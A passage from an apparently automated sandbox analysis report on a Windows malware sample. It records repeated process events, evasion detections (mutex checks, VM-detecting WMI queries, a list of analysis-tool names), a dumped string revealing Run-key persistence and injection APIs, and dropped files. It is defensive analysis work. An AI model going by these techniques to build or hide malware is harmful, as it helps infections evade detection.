                    Source: C:\Windows\explorer.exeCode function: 7_2_0DF25340 LoadLibraryA,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,7_2_0DF25340
                    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Found evasive API chain (may stop execution after checking mutex)
                    Source: C:\Users\user\AppData\Roaming\443320E440F81953448019\443320E440F81953448019.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleepgraph_10-1473
                    Source: C:\Users\user\Desktop\m5804Te9Uw.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleepgraph_3-1455
                    Source: C:\Windows\System32\msiexec.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleepgraph_13-1445
                    Source: C:\Windows\System32\msiexec.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcessgraph_13-1159
                    Source: C:\Windows\System32\svchost.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcessgraph_4-1140
                    Source: C:\Windows\System32\svchost.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleepgraph_4-1363
                    Source: C:\Windows\System32\audiodg.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcessgraph_12-1142
                    Source: C:\Users\user\AppData\Roaming\443320E440F81953448019\443320E440F81953448019.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcessgraph_10-1195
                    Source: C:\Windows\explorer.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleepgraph_7-104852
                    Source: C:\Users\user\Desktop\m5804Te9Uw.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcessgraph_3-1195
                    Source: C:\Windows\System32\audiodg.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleepgraph_12-1413
                    Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                    Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                    Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                    Source: m5804Te9Uw.exe, svchost.exe, 443320E440F81953448019.exe, audiodg.exe, msiexec.exeBinary or memory string: PROCMON.EXE
                    Source: m5804Te9Uw.exe, svchost.exe, 443320E440F81953448019.exe, audiodg.exe, msiexec.exeBinary or memory string: PROCESSHACKER.EXE
                    Source: m5804Te9Uw.exe, svchost.exe, 443320E440F81953448019.exe, audiodg.exe, msiexec.exeBinary or memory string: X64DBG.EXE
                    Source: m5804Te9Uw.exe, svchost.exe, 443320E440F81953448019.exe, audiodg.exe, msiexec.exeBinary or memory string: AUTORUNS.EXE
                    Source: m5804Te9Uw.exeBinary or memory string: GETTHREADIDKERNEL32NTDLLISWOW64PROCESSKERNEL32ZEROX64DIAMOTRIXBOTMADE IN ALGERIA <3SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\STARTUPAPPROVED\RUNSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\STARTUPAPPROVED\STARTUPFOLDERGQGWZD.EXELOADLIBRARYAKERNEL32.DLLGETPROCADDRESSKERNEL32.DLLWCSCPYMSVCRT.DLLWCSCATMSVCRT.DLLWCSCMPMSVCRT.DLLWCSNCPYMSVCRT.DLLWCSLENMSVCRT.DLLSTRLENMSVCRT.DLLREALLOCMSVCRT.DLLFREEMSVCRT.DLLWCSSTRMSVCRT.DLLGETWINDOWSDIRECTORYWKERNEL32.DLLGETVOLUMEINFORMATIONWKERNEL32.DLLLSTRCATWKERNEL32.DLLSETFILEATTRIBUTESWKERNEL32.DLLCLOSEHANDLEKERNEL32.DLLGETVERSIONEXAKERNEL32.DLLDELETEFILEWKERNEL32.DLLCREATEDIRECTORYAKERNEL32.DLLGETFILEATTRIBUTESAKERNEL32.DLLGETMODULEFILENAMEAKERNEL32.DLLCOPYFILEAKERNEL32.DLLGETWINDOWSDIRECTORYAKERNEL32.DLLCREATEFILEAKERNEL32.DLLHEAPALLOCKERNEL32.DLLGETPROCESSHEAPKERNEL32.DLLEXPANDENVIRONMENTSTRINGSWKERNEL32.DLLRESUMETHREADKERNEL32.DLLSETTHREADCONTEXTKERNEL32.DLLRTLCOMPAREMEMORYKERNEL32.DLLVIRTUALALLOCEXKERNEL32.DLLGETMODULEHANDLEAKERNEL32.DLLGETTHREADCONTEXTKERNEL32.DLLGETMODULEFILENAMEWKERNEL32.DLLVIRTUALPROTECTEXKERNEL32.DLLGETLASTERRORKERNEL32.DLLRELEASEMUTEXKERNEL32.DLLCREATEMUTEXAKERNEL32.DLLHEAPFREEKERNEL32.DLLWAITFORSINGLEOBJECTKERNEL32.DLLCREATETHREADKERNEL32.DLLCHECKREMOTEDEBUGGERPRESENTKERNEL32.DLLGETCURRENTPROCESSKERNEL32.DLLISDEBUGGERPRESENTKERNEL32.DLLEXITPROCESSKERNEL32.DLLDELETEFILEAKERNEL32.DLLPROCESS32NEXTWKERNEL32.DLLTERMINATEPROCESSKERNEL32.DLLOPENPROCESSKERNEL32.DLLPROCESS32FIRSTWKERNEL32.DLLCREATETOOLHELP32SNAPSHOTKERNEL32.DLLSETENDOFFILEKERNEL32.DLLLSTRCMPAKERNEL32.DLLWRITEPROCESSMEMORYKERNEL32.DLLREADPROCESSMEMORYKERNEL32.DLLGETFILESIZEKERNEL32.DLLWRITEFILEKERNEL32.DLLADJUSTTOKENPRIVILEGESADVAPI32.DLLOPENPROCESSTOKENADVAPI32.DLLLOOKUPPRIVILEGEVALUEWADVAPI32.DLLGETTOKENINFORMATIONADVAPI32.DLLCREATEFILEWKERNEL32.DLLSHGETFOLDERPATHWSHELL32.DLLSHGETFOLDERPATHASHELL32.DLLLSTRCATAKERNEL32.DLLSETFILEATTRIBUTESAKERNEL32.DLLSHGETKNOWNFOLDERPATHSHELL32.DLLFREELIBRARYKERNEL32.DLLMOVEFILEWKERNEL32.DLLGETFILESIZEEXKERNEL32.DLLGETWINDOWSDIRECTORYAKERNEL32.DLLGETVOLUMEINFORMATIONAKERNEL32.DLLGETTICKCOUNTKERNEL32.DLLWSPRINTFWUSER32.DLLWSPRINTFAUSER32.DLLVIRTUALALLOCKERNEL32.DLLREADFILEKERNEL32.DLLSLEEPKERNEL32.DLLVIRTUALFREEKERNEL32.DLLSETFILEPOINTERKERNEL32.DLLCREATEDIRECTORYWKERNEL32.DLLFINDFIRSTFILEWKERNEL32.DLLFINDNEXTFILEWKERNEL32.DLLFINDCLOSEKERNEL32.DLLCOPYFILEWKERNEL32.DLLWRITEFILEKERNEL32.DLLGETSYSTEMDIRECTORYWKERNEL32.DLLEXITPROCESSKERNEL32.DLLCREATEREMOTETHREADKERNEL32.DLLINTERNETOPENURLWWININET.DLLINTERNETREADFILEWININET.DLLHTTPQUERYINFOAWININET.DLLINTERNETOPENWWININET.DLLINTERNETCONNECTWWININET.DLLHTTPOPENREQUESTWWININET.DLLHTTPSENDREQUESTAWININET.DLLINTERNETCLOSEHANDLEWININET.DLLPATHISURLWSHLWAPI.DLLPATHCOMBINEWSHLWAPI.DLLPATHFINDFILENAMEWSHLWAPI.DLLSTRSTRASHLWAPI.DLLURLDOWNLOADTOFILEWURLMON.DLLCREATEPROCESSWKERNEL32.DLLSHELLEXECUTEWSHELL32.DLLGETMODULEFILENAMEWKERNEL32.DLLGETSHORTPATHNAMEWKERNEL32.DLLGETENVIRONMENTVARIABLEWKERNEL32.
                    Source: m5804Te9Uw.exe, svchost.exe, 443320E440F81953448019.exe, audiodg.exe, msiexec.exeBinary or memory string: IDAQ.EXE
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeMemory allocated: D00000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeMemory allocated: 2660000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeMemory allocated: 4660000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\explorer.exeCode function: 7_2_0DF28660 CreateToolhelp32Snapshot,Thread32First,GetCurrentProcessId,GetCurrentThreadId,HeapAlloc,HeapReAlloc,Thread32Next,CloseHandle,7_2_0DF28660
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 621Jump to behavior
                    Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 671Jump to behavior
                    Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 3049Jump to behavior
                    Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 2618Jump to behavior
                    Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 2919Jump to behavior
                    Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 996Jump to behavior
                    Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 691Jump to behavior
                    Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 667Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeWindow / User API: threadDelayed 2486Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\2FDD.tmp.ssg.exeWindow / User API: threadDelayed 7320Jump to behavior
                    Source: C:\Windows\explorer.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_7-104998
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI5602\api-ms-win-crt-locale-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI5602\_lzma.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI5602\api-ms-win-core-timezone-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI5602\api-ms-win-core-synch-l1-2-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI5602\api-ms-win-core-handle-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI5602\api-ms-win-core-localization-l1-2-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI5602\api-ms-win-core-processenvironment-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI5602\api-ms-win-core-errorhandling-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI5602\_ctypes.pydJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI5602\api-ms-win-crt-runtime-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI5602\api-ms-win-core-debug-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI5602\api-ms-win-crt-conio-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI5602\api-ms-win-core-console-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI5602\api-ms-win-core-libraryloader-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI5602\api-ms-win-core-file-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI5602\api-ms-win-crt-stdio-l1-1-0.dllJump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\5B34.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI5602\_bz2.pydJump to dropped file
